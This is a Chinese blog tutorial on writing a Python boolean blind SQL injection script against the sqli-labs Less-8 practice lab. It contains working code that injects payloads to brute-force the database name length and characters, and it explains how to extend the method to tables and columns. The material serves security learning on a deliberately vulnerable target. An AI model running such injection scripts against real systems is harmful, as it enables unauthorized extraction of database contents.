python实现sql注入脚本

最新推荐文章于 2024-05-23 16:17:43 发布
最新推荐文章于 2024-05-23 16:17:43 发布
阅读量1.7k 收藏 4
点赞数 4
文章标签: python sql oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/czx1234566/article/details/134716460
版权

本人对写这个的脚本理解:

个人认为就是找特征,围绕着这个特征去写脚本。

接下来,我会以sql-labs的less-8靶场为例写一个布尔注入脚本。

首先先找特征:

输入id=1,这个返回的是正确的页面咯,那来看看错误的。

输入?id=1'

会发现页面少了这个

然后我们就以这个为特征,围绕着这个去写个脚本。

爆数据库长度的脚本

可以看到我这里是写了个死循环然后逐步增加这个dblen这个变量的值。

根据dblen这个变量的不断变化,然后用这不断变化返回值写了一个if判断去判断是否有这个返回值里是否有“You are in...........”字符串。

if判断到了这个页面返回值有“You are in...........”字符串他就会退出循环并返回值。

爆数据库名的脚本

这个原理同刚刚所说,只是换了个payload,i是用来代表数据库的长度。

b是代表这个没个字符的ascii的值。

脚本代码如下:

import requests
url='http://node5.anna.nssctf.cn:28084/Less-8/'
dblen=0
while True:
    payload=url+"?id=1' and length(database())="+str(dblen)+"--+"
    print(payload)
    if 'You are in...........' in requests.get(payload).text:
        break
    dblen+=1
print("当前数据库长度:",dblen)
dbname=''
for i in range(1,dblen+1):
    for b in range(33,127):
        payload2=url+"?id=1' and (ascii(substr(database(),"+str(i)+",1)))="+str(b)+"--+"
        if 'You are in...........' in requests.get(payload2).text:
            dbname+=chr(b)
            break
print("当前数据库名:",dbname)

之后的爆表名,列名,字段等,都类似,该下payload就行了,还有这个i的值是可以变的,如果不知道表名的长度,就给i的值的范围给大一点。

希望这篇文章能给到你们一些收获。

xise
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1356
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入
SQL注入
acepanhuan的博客
02-09 506
SQL注入原理
手把手教你用Python轻松玩转SQL注入
最新发布
菜鸟学识的博客
05-23 1185
大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。总的来说,SQL注入无非就是一段艰难险阻的路程,你可以发现但是别人也可以防御,虽然你发现要比较久的时间,但是人家防御却是很轻松,个人觉得得不偿失,不建议大家深入了解,只是做个简单的介绍了解下就好,至少你搜索技能因此而提高了不少吧。
pythonsql注入
love_parents的博客
09-10 3234
转载自: python SQL注入的解决办法 pythonsql注入 背景 APP爆出一个大Bug,只要在查询框内输入“%”,就会检索出所有的数据,最后有人给出了这样的解决方案,在前端进行验证,禁止用户输入“%”之类的特殊字符。 帅呆了!责任轻易地就甩给了前端! 我反问,如果百分号要进行禁止,那么“*&’“()”要不要进行禁止?“desc、select、from”等关键字要不要禁止?还有“+-”,正则表达式相关的符号要不要禁止?就算输入框禁止了,直接发送http请求又如何禁止?
10.26 知识总结(python操作MySQLSQL注入问题、事务、触发器等)
weixin_66010453的博客
10-26 420
由于程序员对用户输入的数据的合法性没有进行判断和处理;导致客户端可以通过向服务器提交恶意输入 ,造成服务端产生畸形SQL语句,从而非法读取网站数据库,而不是按照设计者意图去执行SQL语句。视图就是通过查询得到一张虚拟表,然后保存下来,下次直接使用即可在满足对某张表数据的增、删、改的情况下,自动触发的功能称之为触发器。开启一个事务可以包含一些sql语句,这些sql语句要么同时成功。要么一个都别想成功,称之为事务的原子性。
Python安全之编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1476
本例中以靶机DVWA中的盲注为例。
PythonSQLMap:自动SQL注入和渗透测试工具示例详解
naer_chongya的博客
07-20 1830
在网络安全领域中,渗透测试是一项重要的任务。其中,SQL注入攻击是最常见的一种攻击方式之一。为了简化渗透测试过程中的繁琐操作,开发者们设计了各种自动化工具。其中,SQLMap是一款使用Python编写的强大工具,用于进行自动化的SQL注入和渗透测试。本文将详细介绍SQLMap的使用方法,包括Python语言环境的搭建、SQLMap的安装和配置、基本使用方法以及具体示例,以帮助读者更好地理解和运用这一强大的工具。
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
Python填充SQL参数脚本.zip
05-28
在传统的SQL查询中,我们直接将变量或值插入到查询中,这可能导致SQL注入等安全风险。而参数化查询,也称为预编译语句或Prepared Statement,使用占位符来代表参数,然后在执行时替换为实际值。这种方式能有效防止...
基于Python的自动化SQL注入工具开发
04-29
在众多网络安全漏洞中,SQL注入漏洞以其门槛低、权限高、破坏性强的特点稳居 历年网络安全漏洞排行榜第一名,如何针对SQL注入漏洞进行防范和化解,保障个 人、组织乃至国家的信息安全成为了网络安全领域研究的一个...
Python实现SQL注入检测插件实例代码
09-19
主要给大家介绍了关于Python实现SQL注入检测插件的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
pythonSQL注入仿写SQLMAP脚本.rar
09-26
Python SQL注入仿写SQLMAP脚本是针对网络安全领域的一个实践项目,主要涉及到的是利用Python编程语言来模拟著名的自动化SQL注入工具SQLMAP的功能。SQL注入是一种常见的网络安全漏洞,攻击者通过构造特殊的SQL语句来...
sql注入自动化脚本POST和GET型
m0_73728268的博客
03-09 325
post和get型sql注入自动化脚本
pythonsql注入
weixin_30682415的博客
06-11 348
一、什么是sql注入SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输...
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2162
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
如何用python开发自动化SQL注入脚本
haoahaoahaoahao的博客
01-11 2089
当得到数据库名长度后,使用?id=1' and substr(database(),1,1)='字母'--+ 判断数据库名。print("%s数据库共有" % db_name + str(tab_num) + "张表")print("%s表下有%d个字段" % (tab_name, dump_num))# print("第%d的长度为%d"%(i,usn_len))# print("第%d的长度为%d"%(i,usn_len))print("[-]第%d张表名为: %s" % (i, tab_name))
pythonsql注入步骤_python 打造一个sql注入脚本 (一)
weixin_39809168的博客
11-30 503
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php当我们在网页执行访问了:http://127.0.0.1/sql.php?x=1在数据库其实是这样的$...
37-5 基于时间的盲注 SQL 注入 PoC 的 Python 编写
weixin_43263566的博客
04-24 156
通过这个脚本,我们可以理解到利用Python编写脚本可以自动化执行一些复杂的任务,比如在这个例子中,我们通过自动化的方式来利用时间盲注漏洞获取数据库名称。,通过逐渐增加数据库名称长度的方式,发送带有长度检测payload的HTTP请求,直到找到正确的长度为止。,利用多线程技术,同时测试每个位置上的数据库名称字符,直到获取完整的数据库名称为止。,通过发送包含特殊payload的HTTP请求来检查是否存在SQL注入点。,用于测试给定位置的数据库名称字符是否匹配。下,依次调用上述函数,完成整个过程。
如何用pythonsql注入脚本
02-21
编写SQL注入脚本的步骤可以概括如下:1. 了解SQL注入攻击原理; 2. 建立数据库连接; 3. 获得用户输入; 4. 构建恶意SQL语句; 5. 执行语句; 6. 获取返回结果。使用Python编写SQL注入脚本需要使用MySQLdb模块,它可以实现对MySQL数据库的操作,比如数据库连接、执行SQL语句等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值